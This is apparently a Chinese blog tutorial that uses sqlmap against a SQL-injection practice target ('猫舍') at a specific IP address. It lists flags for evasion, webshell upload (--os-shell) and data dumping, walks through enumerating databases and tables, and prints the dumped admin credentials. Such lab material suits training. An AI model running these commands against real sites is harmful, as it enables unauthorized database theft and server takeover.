SQL注入之猫舍之sqlmap的使用
先说一下最常用的基础指令
-u指定注入点(一般为url栏的网址)
--dbs跑库名
--tables跑表名
--columns跑字段名
--dump枚举数据(高危指令,容易进去)
-D 库名指定数据库
-T 表名指定表
-C 字段名指定字段
这里就是更高级一点的指令
--random-agent选择随机user-agents头
--delay=1每次探测延迟一秒(防止访问过快被BAN)
--count查看数据量(比--dump温柔,不会显示敏感信息)
-- proxy"http://127.0.0.1:1080"使用本地1080端口
--level 1-5测试等级,等级越高检测越详细,例如level大于2会检测cookie注入,大于3会检测头注入
--risk一般都用--level 3 --risk 2
--is-dba查询当前用户权限,如果DBA是true可以尝试直接拿webshell
--os-shell尝试往网站中放入一个cmdshell(拥有cmd权限的shell)
文章图片
需要选择写入shell的脚本语言
好,现在开始正式进入SQL注入子猫舍之sqlmap工具的用法
首先需要检查sqlmap是否能正常使用,在cmd中将文件路径cd为工具所在路径,然后输入如下命令
文章图片
如果看到了下面的景象,那么恭喜你,工具并无大碍
文章图片
接着就使用上面提到的指令-u http://59.63.200.79:8003/?id=1,就会自动进行漏洞检测
文章图片
然后就会显示漏洞检测的结果有两个:基于布尔类型的盲注和基于时间的盲注
但是并没有我们发现的显错注入,这就是工具的弊端,所以不能依赖工具!不能依赖工具!不能依赖工具!
文章图片
我们默认我们都发现了显错注入漏洞,只是用工具来解放双手
所以现在就要准备提取信息,先定位库和表
先看看有哪些库 python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
这个就是查询到的结果
文章图片
然后可以使用-u http://59.63.200.79:8003/?id=1 -D maoshe --tables来看看maoshe库里有哪些表主要是寻找admin表,当然其他库也要看看,这里只是因为我们知道maoshe库里有我们想要的东西
这个就是查询到的结果
文章图片
现在就可以使用能吃牢饭的高危指令(一般做渗透测试未经受援不能查看敏感信息) -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --dump
文章图片
来查看admin表里的信息
得到了最后需要的
username:admin
password:hellohack
工具用起来只要知道命令就非常简单,但是工具也只是是没有自主意识的工具,不能完全代替手注所以
不能依赖工具!
不能依赖工具!
不能依赖工具!
【SQL注入之猫舍之sqlmap的使用】
推荐阅读
- 带有Hilt的Android上的依赖注入
- 解决SpringBoot引用别的模块无法注入的问题
- py连接mysql
- 2019-01-18Mysql中主机名的问题
- MySql数据库备份与恢复
- 11-代码注入
- mysql|InnoDB数据页结构
- 数据库|SQL行转列方式优化查询性能实践
- mysql中视图事务索引与权限管理
- MYSQL主从同步的实现